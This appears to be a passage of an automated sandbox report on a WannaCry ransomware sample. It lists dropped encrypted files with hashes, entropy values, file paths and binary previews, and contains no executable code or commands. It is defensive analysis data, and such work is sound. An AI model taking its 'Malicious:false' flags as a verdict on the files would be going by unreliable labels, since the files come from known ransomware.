                                                                                      SHA-256:AE34064EDD645707F8CFC3DD3E2E0B1AC44AFE7824340FB0E9CD8F4B9CE6820D
                                                                                      SHA-512:3CB4E99A7FF13A694475EE5C56ACF168CF511BD4E3028EC9CCDC6C227933C27B27B0740E1A18CF3BB487CF55C8563088362524649CF26B9EE08665E8914624F9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B.....?b.SP.&.J..@..!+..#..M`..D......z.....B.."..~@....A4j.O(...g]....O.d.2.f.H9.3.o........../..kA...z.q.C... ..>....^H/..p)..I.Ro..Z.H......V.........b.]ia.......8.M[d...u..s.|^..8.;6^....!.......<....;. ..p...w......\...t.r...M......../q..............P>]CJ..J..."R.^....i.P@.Q.......?%8j8..(.|...q......./z(.pw..&.>...xN..0.U.Q.a..sy;..:.b@.....q......."[.T8....|.a.t>.IN...\,rH....."....5|..."0..h.|uUC.j/!Y....y.O+AL......BH.)b......y.;...2.m..I.h.E.A.F..^..:...J..\..].N..'....$.......2C\...(.B&..\.t....A.......m.9.]*.i..1.S.%.>n.:.>f..`.........2....;Q.\..<..8.bD.....S*.C.how.6..{=.........}..Q.=..=.p..%.y.U}~r&..Pb.-.9EqQ]Y.....j3i.tjm.....?..{.gCx..cD..O.......Y.....M...WBK[......M..]...1.9..`....,*$.R..giW...mS.[..0A...;.}X.i.M.,...r..E...9.@.Q..c;.+l.I.t].k(..ky.#ZP....R\.._.p....9.......X.AiS.#......2.k....2...*...$=.f.....}.X...=..QGTm.._ ._d...kp..T..H.TD.R{.<..'.YL!]ta.b.C..%..1$....aN.X.....wh...v.......8|].YF
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5240
                                                                                      Entropy (8bit):7.962754223102296
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ohl+9E/j23p+xN6BDp//68TPwlZ+ADWWhGF+YM5v8P6XiDQJAwfxgVmQ8RjikgR:8t/j2GN6H/ZDcWWM+YM5ve6XmQGwpgVh
                                                                                      MD5:8914E33BEFB25BF50C484694B0619D39
                                                                                      SHA1:5CEEEC5F2C2D564E724B0E6E9372C75EEFEDEE3A
                                                                                      SHA-256:BBBC0A3CB79D1E31A8136313A7B026B37BEC18C4BF1B50422C731B81323D941F
                                                                                      SHA-512:E891612E261D181DAE9F08288B1222BC8F3147AA8C4BE425867BA355BE4732A1F03F41EE20D2BE368A39D02D397692D12E64A7ECBBBC26C48B1D46EDC4822DB5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........2*).....Z.A...&T..(.[{`?.2..]$.z.^.'&..<6t..W...W...?(6..BnE.........T...?....Z...#202t?8..R.e".1.=.,f.}....T|......JD~.B~H<.Y.......@..bC..P...2..5..Y.XDC<..D.q.5.v{.z..D...!.B"...T...~Z.x ..IP.$.[%.b..._.M......75&.k_.............l.5.w....._..........='..K.._.*s.`...,....k..a.....3%tm..x.......N...D..6\.......)."...V....ul&...UOpI..eFH`0=..Q.[.e..Y}...G".-.-*......+.(..3..W.....]M....M.Z...8..*.-0.m.b^j .?. ...."....V....f.......Z;{yP.3.....`..k..\....A..#7......p.q8.....K....h6..p^@...#G>G.p.s".q.y..!x....D..*P...vP:.K.4.LU.......t......:@d....l.....-...]....'l..p...h.M=.P.<.aY.....TO...} .y.=.d01?.....r.%.;...H_cF3\....*..We..a.*h|....6..*.....`!....to..ym..(.t.=r[..\M|+..-...S.....*..;.......3.O..q\....8Y.=..*s....W.1$|..,...|....1...Y.n.c....)..9;.,.E.._"B?.<.A..*..lqQC..W~So.]......7@+......i....G.j......@..}....#.S.t.^..A..m,.4.-..h..-..^....!.'....V.E.....uN.Kk..N........0....L@xnv.....c....hv....b2`6W.\....D.N[a....)
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5240
                                                                                      Entropy (8bit):7.962754223102296
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ohl+9E/j23p+xN6BDp//68TPwlZ+ADWWhGF+YM5v8P6XiDQJAwfxgVmQ8RjikgR:8t/j2GN6H/ZDcWWM+YM5ve6XmQGwpgVh
                                                                                      MD5:8914E33BEFB25BF50C484694B0619D39
                                                                                      SHA1:5CEEEC5F2C2D564E724B0E6E9372C75EEFEDEE3A
                                                                                      SHA-256:BBBC0A3CB79D1E31A8136313A7B026B37BEC18C4BF1B50422C731B81323D941F
                                                                                      SHA-512:E891612E261D181DAE9F08288B1222BC8F3147AA8C4BE425867BA355BE4732A1F03F41EE20D2BE368A39D02D397692D12E64A7ECBBBC26C48B1D46EDC4822DB5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........2*).....Z.A...&T..(.[{`?.2..]$.z.^.'&..<6t..W...W...?(6..BnE.........T...?....Z...#202t?8..R.e".1.=.,f.}....T|......JD~.B~H<.Y.......@..bC..P...2..5..Y.XDC<..D.q.5.v{.z..D...!.B"...T...~Z.x ..IP.$.[%.b..._.M......75&.k_.............l.5.w....._..........='..K.._.*s.`...,....k..a.....3%tm..x.......N...D..6\.......)."...V....ul&...UOpI..eFH`0=..Q.[.e..Y}...G".-.-*......+.(..3..W.....]M....M.Z...8..*.-0.m.b^j .?. ...."....V....f.......Z;{yP.3.....`..k..\....A..#7......p.q8.....K....h6..p^@...#G>G.p.s".q.y..!x....D..*P...vP:.K.4.LU.......t......:@d....l.....-...]....'l..p...h.M=.P.<.aY.....TO...} .y.=.d01?.....r.%.;...H_cF3\....*..We..a.*h|....6..*.....`!....to..ym..(.t.=r[..\M|+..-...S.....*..;.......3.O..q\....8Y.=..*s....W.1$|..,...|....1...Y.n.c....)..9;.,.E.._"B?.<.A..*..lqQC..W~So.]......7@+......i....G.j......@..}....#.S.t.^..A..m,.4.-..h..-..^....!.'....V.E.....uN.Kk..N........0....L@xnv.....c....hv....b2`6W.\....D.N[a....)
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14408
                                                                                      Entropy (8bit):7.988614230642307
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:j84Gnv8tyktSNoMDY9pEj83YpYZPhBEk51YHy4gIa6gL1h:cQwREL3RJ/oHKIatz
                                                                                      MD5:83764536A31E24C1C9C67B4FBE766972
                                                                                      SHA1:EDB528FC869121B55905B5D8F5BA537F921CF11F
                                                                                      SHA-256:407C798A5DAFF2BCB1469580DFAAA7E2F83B81C2F581AD6305E28E465B86F807
                                                                                      SHA-512:63E03E2096A1D1DF58E00B3E3340EB32C4807AA69809EE3C65D6C48C037E75AEFD661E73133B2967BA3A400047616D06853037A2C7715AA778F819C996C00FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........u./.....|[r(...&6.1P..........Z..A...k....`?....q$d.FP..{..........SX./(FA.--.].....A........BG...v&O.J..by)..J....jS.r.P....az..Cb .!~..&....6.++...xg..........g.1..:....F.........s...v..36T....0PT.Y.$[ylz.......c.J;..8..{....^.J.."...$.p....+7............:>....!j..UK..$%..x!..$..m.d`s.-.%Y..2y46."8...K.$.?{......KD.....`..*.0=.{JT]...E...G7....Z.....AR.PZ..4|....?.....6Xv..C.E..zw.s...."o..Vp..m..M..i]........@.0{5.K:@.b..%...V.a@...L..N....n..M+w.[T.5...X.L.s10...Q..@..F..yW~.....T.....+.r....&.G3*.\.....Q..DH.5.N.(.MN..;,~%_VK....=+'/...A.V....o?.......2$.0p.Q.k.8 ......0\..x.g..m^.,Q|B...... ..*.Hi......$...O...X.5 /........4)......=..E...c......#4.b.C.p7...$"..6K6.].<.j.A...4.rO.P/.a.nL..x...3..o........V..U._.1.....'}2...F5.~....D..^~F..f....qc.....c..O.U%.FYAB.hQ...w(G.j.8...A^.+.[.-7..Q.r.r...|4.......l.yO8...h...8{...NM......\[.v?....*.,?.....o...]..w.g..P...p.C.7.pL)H...<.9...i........s.&#.PE
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14408
                                                                                      Entropy (8bit):7.988614230642307
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:j84Gnv8tyktSNoMDY9pEj83YpYZPhBEk51YHy4gIa6gL1h:cQwREL3RJ/oHKIatz
                                                                                      MD5:83764536A31E24C1C9C67B4FBE766972
                                                                                      SHA1:EDB528FC869121B55905B5D8F5BA537F921CF11F
                                                                                      SHA-256:407C798A5DAFF2BCB1469580DFAAA7E2F83B81C2F581AD6305E28E465B86F807
                                                                                      SHA-512:63E03E2096A1D1DF58E00B3E3340EB32C4807AA69809EE3C65D6C48C037E75AEFD661E73133B2967BA3A400047616D06853037A2C7715AA778F819C996C00FF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........u./.....|[r(...&6.1P..........Z..A...k....`?....q$d.FP..{..........SX./(FA.--.].....A........BG...v&O.J..by)..J....jS.r.P....az..Cb .!~..&....6.++...xg..........g.1..:....F.........s...v..36T....0PT.Y.$[ylz.......c.J;..8..{....^.J.."...$.p....+7............:>....!j..UK..$%..x!..$..m.d`s.-.%Y..2y46."8...K.$.?{......KD.....`..*.0=.{JT]...E...G7....Z.....AR.PZ..4|....?.....6Xv..C.E..zw.s...."o..Vp..m..M..i]........@.0{5.K:@.b..%...V.a@...L..N....n..M+w.[T.5...X.L.s10...Q..@..F..yW~.....T.....+.r....&.G3*.\.....Q..DH.5.N.(.MN..;,~%_VK....=+'/...A.V....o?.......2$.0p.Q.k.8 ......0\..x.g..m^.,Q|B...... ..*.Hi......$...O...X.5 /........4)......=..E...c......#4.b.C.p7...$"..6K6.].<.j.A...4.rO.P/.a.nL..x...3..o........V..U._.1.....'}2...F5.~....D..^~F..f....qc.....c..O.U%.FYAB.hQ...w(G.j.8...A^.+.[.-7..Q.r.r...|4.......l.yO8...h...8{...NM......\[.v?....*.,?.....o...]..w.g..P...p.C.7.pL)H...<.9...i........s.&#.PE
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7944
                                                                                      Entropy (8bit):7.97593554676498
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:4pe28i3tzAwMF/EW0s18c4BgKU0bjo9gRe0zo30vHnVeAXZJkqGw/5:4o2TdzAwm/z8c4BHbc9s3nIApJTZ
                                                                                      MD5:98720041B0EB5C6543A67F5C123C6110
                                                                                      SHA1:219DEC64F113436ACB571BA09EE89CF493E158CD
                                                                                      SHA-256:42A2920DB46780F76A921FBEA3FFDCE863E0891A9D899A95616408BAAFC17817
                                                                                      SHA-512:93DC69F2C21375EEDB18EE07C2A7E354A9CE7AFFD7085E86A90D19CCC4767EC3E38E33550E9C7C5867E3DABA0A00AEB74158B74FFE253476A5D9A4077248241C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......~..J.o.|DzL..t....b...qP..We.5<.`....W1.F(.....V.|..._......hf..OD..F..C...r..F.qf....o....nc52Qy.$.....<....9!?.V......*.!....6wE..:..5.p+.v...... ...u...jX..P..*.p.>....HL.Yi....G.xV...!.+..5..5;:.y.ES..C..l.b..:.....3..}.n..(..-\P.K..............FcGv.PS..6...........d.(tS................A....G.>.c.....IN.'9..0.)c...r~.a#..3H~?t.&..r{ ..F..Q.....?.b./..,..xqp..T..M}.s*.B.o.`..>...=.e9..~...).ox...U.._....I<.#N.%.\.i..0...,.XY.z.d.A...s..3QW.0....m.g..'"1...].........+hjD..1e.JP.J.5E..uM.'.....x3T.h|".....T..W.t.{.R.U.]r./.4.F. .P...;~v/.........ilx%{.c.....z._...\...K.(.....X.o..[.u5.9..R.G...iA...a......@.....;t........K9...Nk9...E....z..Wn..5q.z.....$..........W...~..s@N:..Se..W....Fo....yPc|@.;Ze.60...iJ}..jz.....E...q.........E..E;....F7#."p.;.#B.l..Y.....<.#....a..1.....rH......1...q..%.kD=..x.>.hq....a.<-=Zu~....I..,......]....x)D.s...j..~..E.CVVz.8l..z.@..{c...PL..dA....nF.6. {8..........):7....7..+..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7944
                                                                                      Entropy (8bit):7.97593554676498
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:4pe28i3tzAwMF/EW0s18c4BgKU0bjo9gRe0zo30vHnVeAXZJkqGw/5:4o2TdzAwm/z8c4BHbc9s3nIApJTZ
                                                                                      MD5:98720041B0EB5C6543A67F5C123C6110
                                                                                      SHA1:219DEC64F113436ACB571BA09EE89CF493E158CD
                                                                                      SHA-256:42A2920DB46780F76A921FBEA3FFDCE863E0891A9D899A95616408BAAFC17817
                                                                                      SHA-512:93DC69F2C21375EEDB18EE07C2A7E354A9CE7AFFD7085E86A90D19CCC4767EC3E38E33550E9C7C5867E3DABA0A00AEB74158B74FFE253476A5D9A4077248241C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......~..J.o.|DzL..t....b...qP..We.5<.`....W1.F(.....V.|..._......hf..OD..F..C...r..F.qf....o....nc52Qy.$.....<....9!?.V......*.!....6wE..:..5.p+.v...... ...u...jX..P..*.p.>....HL.Yi....G.xV...!.+..5..5;:.y.ES..C..l.b..:.....3..}.n..(..-\P.K..............FcGv.PS..6...........d.(tS................A....G.>.c.....IN.'9..0.)c...r~.a#..3H~?t.&..r{ ..F..Q.....?.b./..,..xqp..T..M}.s*.B.o.`..>...=.e9..~...).ox...U.._....I<.#N.%.\.i..0...,.XY.z.d.A...s..3QW.0....m.g..'"1...].........+hjD..1e.JP.J.5E..uM.'.....x3T.h|".....T..W.t.{.R.U.]r./.4.F. .P...;~v/.........ilx%{.c.....z._...\...K.(.....X.o..[.u5.9..R.G...iA...a......@.....;t........K9...Nk9...E....z..Wn..5q.z.....$..........W...~..s@N:..Se..W....Fo....yPc|@.;Ze.60...iJ}..jz.....E...q.........E..E;....F7#."p.;.#B.l..Y.....<.#....a..1.....rH......1...q..%.kD=..x.>.hq....a.<-=Zu~....I..,......]....x)D.s...j..~..E.CVVz.8l..z.@..{c...PL..dA....nF.6. {8..........):7....7..+..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8840
                                                                                      Entropy (8bit):7.981285560384861
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:dOfqmOAlxb8k6WYwnn1XKHwg2uufV6RBHMeUv9mPhzIQlcYZ:dO0ALWWYwn14wF7fwBseUveIQlcq
                                                                                      MD5:A8FEB3FA2D61D4397149485BC139ED61
                                                                                      SHA1:0F058BA1A2265B2890E66DD006DE9F1BAEBAE805
                                                                                      SHA-256:CE9B64C3F631CA55D910C2F2BBB729E0565A41DC9FE824CA64AF4103B91D31B6
                                                                                      SHA-512:A6B1F08B95C60CDAC0F75C80C294A3954C37FD9841887785ED3DC1237899C76024837F265E664CCBE5232B3A2C39FE63A4EC523F63FEB70C11B114698A522FB1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t..y.@.T.~./..a..!=....J.A...]Q../...2I-.%...d.@Kkg..b....U......>....X.a....'..h......rPfZi..>c.."s..*C+F.K.4...8n..S.c.lT>./...<..f:....Q._.,...r(....b.M.SFW.....a.c.....w;X..X...bUiV.P...@.... M `..y..fY.D.]_.....Tx*.'I.n...UU..^......m!.*....i!.........z%.,F...z>./.R..s:....O.>.D..J6R..s.K..x.V..q....vO...d.C...X(.26....).8VzU=.jeU...R..t..B.....C...7.t.....S.v...v.O.C"..E..05..&..~.#.F..u....+.D.o....2.G...EP.r.(..S..b.U+h....w..`.8K.>..v.l.a.s.i..:........x..z.z.?l.......zZ.{.v.=...=....?f/(.d.r.l....l5F!.{Z.1...kh.gL...................."Fq....Iw..r...y...=..?HhqK..%..*..ziX..Dc4&.:..........0. ^..xwi-?..lQ.P..P._..s.T..T.B7b.Cc.......]...]`F...l.`1..l....p.A....R.Vu+....`...]W..9.-'z.`..^...?f..6..=.[<y...o.....[.>].i.......;..3..[.F.ot.(.[J..*.....Xe...P.p2.lL.Z.S.....`..{.x.....@d....ds..!.m.H'\x....&...wlO.V`..........(....n(;o.@..X.......)...t.pwC..A&.Z<.\.\)3m..a..........=.=...n9\....E..M...s.t}.a.*...@k"..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8840
                                                                                      Entropy (8bit):7.981285560384861
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:dOfqmOAlxb8k6WYwnn1XKHwg2uufV6RBHMeUv9mPhzIQlcYZ:dO0ALWWYwn14wF7fwBseUveIQlcq
                                                                                      MD5:A8FEB3FA2D61D4397149485BC139ED61
                                                                                      SHA1:0F058BA1A2265B2890E66DD006DE9F1BAEBAE805
                                                                                      SHA-256:CE9B64C3F631CA55D910C2F2BBB729E0565A41DC9FE824CA64AF4103B91D31B6
                                                                                      SHA-512:A6B1F08B95C60CDAC0F75C80C294A3954C37FD9841887785ED3DC1237899C76024837F265E664CCBE5232B3A2C39FE63A4EC523F63FEB70C11B114698A522FB1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t..y.@.T.~./..a..!=....J.A...]Q../...2I-.%...d.@Kkg..b....U......>....X.a....'..h......rPfZi..>c.."s..*C+F.K.4...8n..S.c.lT>./...<..f:....Q._.,...r(....b.M.SFW.....a.c.....w;X..X...bUiV.P...@.... M `..y..fY.D.]_.....Tx*.'I.n...UU..^......m!.*....i!.........z%.,F...z>./.R..s:....O.>.D..J6R..s.K..x.V..q....vO...d.C...X(.26....).8VzU=.jeU...R..t..B.....C...7.t.....S.v...v.O.C"..E..05..&..~.#.F..u....+.D.o....2.G...EP.r.(..S..b.U+h....w..`.8K.>..v.l.a.s.i..:........x..z.z.?l.......zZ.{.v.=...=....?f/(.d.r.l....l5F!.{Z.1...kh.gL...................."Fq....Iw..r...y...=..?HhqK..%..*..ziX..Dc4&.:..........0. ^..xwi-?..lQ.P..P._..s.T..T.B7b.Cc.......]...]`F...l.`1..l....p.A....R.Vu+....`...]W..9.-'z.`..^...?f..6..=.[<y...o.....[.>].i.......;..3..[.F.ot.(.[J..*.....Xe...P.p2.lL.Z.S.....`..{.x.....@d....ds..!.m.H'\x....&...wlO.V`..........(....n(;o.@..X.......)...t.pwC..A&.Z<.\.\)3m..a..........=.=...n9\....E..M...s.t}.a.*...@k"..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9032
                                                                                      Entropy (8bit):7.980836773187939
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bJyCrrx145lOwq7XbvzhQVk6/omxmEW5eCwZLzrXK8kvo9INITRP:bJ7523Owq7XbvzGVnX3WozEvo9RV
                                                                                      MD5:F6F734CC4751A9282A80C737E6A70366
                                                                                      SHA1:F9348B93D58948FCC057A05C456DDCD1E95AEAD8
                                                                                      SHA-256:5C8541EAAD14B4C8DCC1F9633519046DC64FBF521BC62C4BF285FCD9DA5B45B1
                                                                                      SHA-512:B792B9ABB71EE375DF105A024FAAA998D0017E6398E10D870BC64CF62670C902A6038650EFB6137DA8346567E402B33EF96A62E233EEA94E37955B101208CDE7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......]q.tg.Pk.&...V~..o..sh.eWf...........dZ.Og5.s.`?,.=].".....a......~.:..wY.h.n.wK^.........K..UfdY`w..R<...........1)...`q........V.rC:....L`..x..60.L.....>k'/8Q....=....S..y..../..u.9...1..Dm.(4.<.4W7.z~L........&..k.......o.U.#R6..l;..)AaE....*"......).V.[......).&hP.._`......m.3f.q.nS|~....Cp..iu.K.-..A..w...X?...G.....p...e...[I..Uq.#.L.i..#.J.~k.Z."cwZ..Q..9!.w...".e.(.C.|..,`...cp.....4M|... .-..^.T..P.K.*...[br.._.o........../.N.g(BNha.I.Z5G.k0.........{..f.(X...[...=..X...#]...|.2n...9Yc8....o..f8...Ib.;*4...*.R.5.D.L;...6...nC.Y.d.G.....Z..P.D......._......1.mc$/Z..<^J3yMW."....c......N s-7.2...Zc.;.w.c-...#Cq...Z.9..,.}o/....VU7U.W.uD..V.l .{.d_..`J.(......K......V...Q(}.....a#...eC.]xWX.?>M...2..X.. .$.....9S).[.NN...".@.v.:......weu.y.^ ......`1u.h.|^./...H4..l..HeC......o..f.....w...A.o.. ./....@.$..7M..FyM...W9C|@y..-|...@.....w....1y.......}h....{?.>Q..._....~"EB.....vb.*....e^.u......<..!....iv]3k....6...B.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9032
                                                                                      Entropy (8bit):7.980836773187939
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bJyCrrx145lOwq7XbvzhQVk6/omxmEW5eCwZLzrXK8kvo9INITRP:bJ7523Owq7XbvzGVnX3WozEvo9RV
                                                                                      MD5:F6F734CC4751A9282A80C737E6A70366
                                                                                      SHA1:F9348B93D58948FCC057A05C456DDCD1E95AEAD8
                                                                                      SHA-256:5C8541EAAD14B4C8DCC1F9633519046DC64FBF521BC62C4BF285FCD9DA5B45B1
                                                                                      SHA-512:B792B9ABB71EE375DF105A024FAAA998D0017E6398E10D870BC64CF62670C902A6038650EFB6137DA8346567E402B33EF96A62E233EEA94E37955B101208CDE7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......]q.tg.Pk.&...V~..o..sh.eWf...........dZ.Og5.s.`?,.=].".....a......~.:..wY.h.n.wK^.........K..UfdY`w..R<...........1)...`q........V.rC:....L`..x..60.L.....>k'/8Q....=....S..y..../..u.9...1..Dm.(4.<.4W7.z~L........&..k.......o.U.#R6..l;..)AaE....*"......).V.[......).&hP.._`......m.3f.q.nS|~....Cp..iu.K.-..A..w...X?...G.....p...e...[I..Uq.#.L.i..#.J.~k.Z."cwZ..Q..9!.w...".e.(.C.|..,`...cp.....4M|... .-..^.T..P.K.*...[br.._.o........../.N.g(BNha.I.Z5G.k0.........{..f.(X...[...=..X...#]...|.2n...9Yc8....o..f8...Ib.;*4...*.R.5.D.L;...6...nC.Y.d.G.....Z..P.D......._......1.mc$/Z..<^J3yMW."....c......N s-7.2...Zc.;.w.c-...#Cq...Z.9..,.}o/....VU7U.W.uD..V.l .{.d_..`J.(......K......V...Q(}.....a#...eC.]xWX.?>M...2..X.. .$.....9S).[.NN...".@.v.:......weu.y.^ ......`1u.h.|^./...H4..l..HeC......o..f.....w...A.o.. ./....@.$..7M..FyM...W9C|@y..-|...@.....w....1y.......}h....{?.>Q..._....~"EB.....vb.*....e^.u......<..!....iv]3k....6...B.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7032
                                                                                      Entropy (8bit):7.968172882176766
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:opzqZu1ZkQnnMTJXgsquuDfCjtp8M7wukiGtdXs3CnV1EQa6lEg3W+0JYj1/82GH:u+ZY7MT/qfC+hnOMvYYVOrgzakojyMcM
                                                                                      MD5:2D51C49D6EA2A2BCD485A2294199C860
                                                                                      SHA1:21C1314AEBA7D95D82BCB8A3FF7F4736598CC265
                                                                                      SHA-256:611BF3409E77F4445BD0B98C859DFA98E4A470D3E24482325039C50B0A58F277
                                                                                      SHA-512:B02C49053FEBFDAEC4C7D02AD14A16148286013078ABF3EDECABA705899321401C067FD4A71A557E17B919D91E6A549B9A8B2D47DAAB8F93F6A54C21773E134E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....0.+.&..).M..e..De.j..v%.z......,E`....LU^.!...._..n..L..|Ay.=.7d+3.R..Zt....Q@....y.>.=.....N...q.|r... ...u.E!..f@...$a2....q{T<.6X.......Qe#.N.hA8xOa"t..V2....V..%..3M......n..z8R.=O..m...R.......}.V..9..<.j>.+-.f9c....cv....P...'..XUl..-.<....T........n8zI.....}.../.@.^v..q?.@,.O.....)...f.-.7jm*s..I.....p.n..P.{..r.2..v-\.N...p......u .i$-.\.|.zR/...Y....L0...L.1.Q.wT.Q...<)cM._.V..D#...".....KT.6td.-.%h..J."LV..K_r....~T.gDp..-..u.$....w.=fK...7....xN<._cs~....)....FT.J......VP.0.K..?....0..f.'.c.....:x<.@.t...d.yg...l..X.8.?...".......*..r"}...?..J..>.....V/..n....i..F..y..z.b..u...H6...m...`^!2..=......u.....<.6..:.0.E.....g4.o......4G....5.0..;*..w.......,.O.y..01.(..R.n..W...f.....4.`.7z..B..e........K....o....W.(..C..... $_-:.. 1x.N..m.[G. ..|_.j.......N"=5..u9...I.`p.......iL.sQ>6zI/.d..{lli?s.......M...XTF..5......5X2.*BO?4M.eZ..~e.....qiW...-B^........,7k)J..L(..,!./XN....._-.K....Y.=w.G...ZiA[=..y4.W..`.b.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7032
                                                                                      Entropy (8bit):7.968172882176766
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:opzqZu1ZkQnnMTJXgsquuDfCjtp8M7wukiGtdXs3CnV1EQa6lEg3W+0JYj1/82GH:u+ZY7MT/qfC+hnOMvYYVOrgzakojyMcM
                                                                                      MD5:2D51C49D6EA2A2BCD485A2294199C860
                                                                                      SHA1:21C1314AEBA7D95D82BCB8A3FF7F4736598CC265
                                                                                      SHA-256:611BF3409E77F4445BD0B98C859DFA98E4A470D3E24482325039C50B0A58F277
                                                                                      SHA-512:B02C49053FEBFDAEC4C7D02AD14A16148286013078ABF3EDECABA705899321401C067FD4A71A557E17B919D91E6A549B9A8B2D47DAAB8F93F6A54C21773E134E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....0.+.&..).M..e..De.j..v%.z......,E`....LU^.!...._..n..L..|Ay.=.7d+3.R..Zt....Q@....y.>.=.....N...q.|r... ...u.E!..f@...$a2....q{T<.6X.......Qe#.N.hA8xOa"t..V2....V..%..3M......n..z8R.=O..m...R.......}.V..9..<.j>.+-.f9c....cv....P...'..XUl..-.<....T........n8zI.....}.../.@.^v..q?.@,.O.....)...f.-.7jm*s..I.....p.n..P.{..r.2..v-\.N...p......u .i$-.\.|.zR/...Y....L0...L.1.Q.wT.Q...<)cM._.V..D#...".....KT.6td.-.%h..J."LV..K_r....~T.gDp..-..u.$....w.=fK...7....xN<._cs~....)....FT.J......VP.0.K..?....0..f.'.c.....:x<.@.t...d.yg...l..X.8.?...".......*..r"}...?..J..>.....V/..n....i..F..y..z.b..u...H6...m...`^!2..=......u.....<.6..:.0.E.....g4.o......4G....5.0..;*..w.......,.O.y..01.(..R.n..W...f.....4.`.7z..B..e........K....o....W.(..C..... $_-:.. 1x.N..m.[G. ..|_.j.......N"=5..u9...I.`p.......iL.sQ>6zI/.d..{lli?s.......M...XTF..5......5X2.*BO?4M.eZ..~e.....qiW...-B^........,7k)J..L(..,!./XN....._-.K....Y.=w.G...ZiA[=..y4.W..`.b.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048
                                                                                      Entropy (8bit):7.795680363930602
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5TYUw2nfioauGwWZVi9SFyv+f16sAvLgII1x9h3UNnwbf:bk5ThnHaDZVicF9f16s/jzWof
                                                                                      MD5:EA2B16DBE285997846F3EE6830A4F456
                                                                                      SHA1:A732A4603A47E4F6BA66C91D138FC65BC5917893
                                                                                      SHA-256:07DD673E7CB92E1D04B8E5DD0D436F1E02C26B132762D42D1D700D98F198CB30
